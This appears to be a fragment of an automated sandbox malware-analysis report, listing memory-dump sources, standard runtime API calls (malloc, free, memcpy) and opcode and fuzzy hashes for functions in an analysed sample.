                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C4D0A4D), ref: 6C52B67F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: malloc$free
                                              • String ID:
                                              • API String ID: 1480856625-0
                                              • Opcode ID: 0538a4dc82b109bd929185f583349266aa5fe2e7e9a15f29c7c9042ffe63c8f2
                                              • Instruction ID: 4512d9e32258539d21c27e4bafa42fdef39ce1471a5f93087a8b13bcdf2fb678
                                              • Opcode Fuzzy Hash: 0538a4dc82b109bd929185f583349266aa5fe2e7e9a15f29c7c9042ffe63c8f2
                                              • Instruction Fuzzy Hash: 5431F471A012168FDB10EF58CC84A5ABBF5FF80305F168A29C81B9B341EB35F915CBA0
                                              APIs
                                              • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C4FF611
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C4FF623
                                              • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C4FF652
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C4FF668
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memcpy
                                              • String ID:
                                              • API String ID: 3510742995-0
                                              • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                              • Instruction ID: 8c21b4df0fb5b731c932892ecd39f377392cb2715538ab5aaf2757a155bf4fe8
                                              • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                              • Instruction Fuzzy Hash: A8314B71A00224AFDB14CF29CCC0E9E77F5EBC4354B148538EA598BB05E631E946CB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: adf499abd794ad8db8b93a968faeb889657cadf594e20e2b34d33be2b1b3c6fd
                                              • Instruction ID: 7fb89141c91d18d43c1df5b2c8d5f9110bdbe2f36502ce94759db0ec4f0f1325
                                              • Opcode Fuzzy Hash: adf499abd794ad8db8b93a968faeb889657cadf594e20e2b34d33be2b1b3c6fd
                                              • Instruction Fuzzy Hash: F8F0D1B27052005BF7109A18EC88E5BB3A9AB5635DB150035EA1AC3F02E732F918C6A6